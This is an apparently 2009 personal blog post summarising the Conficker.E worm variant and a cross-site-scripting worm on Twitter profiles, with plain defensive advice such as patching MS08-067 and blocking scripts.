Worms, worms and more worms…


It’s been a busy week for the virus creators and the antivirus companies.  And we’re all the collateral damage.  On April 8, Conficker finally got the update that the world was dreading 8 days earlier.  As you know, the Internet didn’t end though.  Then over the Easter weekend, Twitter was attacked by a worm (along with a series of copycats the next day).

Conficker:

According to F-Secure’s weblog, Conficker.E appeared on April 8.  Some of the highlights of the new variant are:

  • It coexists along with Conficker.C (meaning you can be infected with both variants).
  • It was spread via the P2P network (not the domains that Conficker.C was checking).
  • It reintroduced the Spreading through the MS08-067 security hole, which had been removed from Conficker.C.  Apparently enough people STILL HAVE NOT PATCHED this hole, so it’s a viable method of spreading.
  • It doesn’t use domain name generation.
  • There are possible connections to Waledec and Rogue Antispyware/antivirus products due to Conficker.C computers connecting to domains that host those malware and downloading it.  Or the connection could be that it automatically downloaded when they reached the website (kind of like it does when WE go there).
  • On May 3, 2009 Conficker.E will remove itself.  However it will leave Conficker.C on the computers. 

Why the creators went this route, no one’s sure.  It could be that they are playing with the security researchers (kind of saying “We’re learning and adapting to whatever you do.”), or they are just using this as a test run to see what their options are.

Either way, update your antivirus and patch your systems.  MS08-067 has been out since October of 2008.  There is NO excuse for not having the patch installed by now.

Twitter Worms:

  Over the Easter weekend, one of Twitter’s competitors discovered a new way of promoting his site.  He found a security vulnerability in how Twitter does their profiles (using JavaScript obfuscation) and used that to spread links to his site throughout twitterland.  The next day, he openly admitted what he did.

Now, there are copycats of his worm that are infecting profiles.  As of right now, they’re just pushing links out to anyone who views the profiles—but that doesn’t mean that they can’t or won’t do something more. 

JavaScript obfuscation is a fancy way of saying that they’re hiding the commands in a way that antivirus and antispyware won’t easily catch them.  And because of the fact that there are so many ways of hiding a command, the usual methods of detection (having a set pattern or signature) don’t work.  The actual worm is a XSS (Cross Site Scripting) worm, which means that when you go to one site, the JavaScript executes commands from another site as well.

For now, the recommended precautions are to use Firefox with the No-Script addon installed (as this blocks all scripts including the JavaScript worms), and don’t surf profiles on Twitter.  Most importantly, don’t click on any links in tweets, replies, or direct messages.  Hopefully Twitter will have this hole closed up soon.

If you’re a twitter user, I would add “twitter” to your following list.  That way you can keep up to speed on what’s happening.

As I hear more, I’ll post more.  Have a great day:)

Patrick.

Leave a comment

Your email address will not be published. Required fields are marked *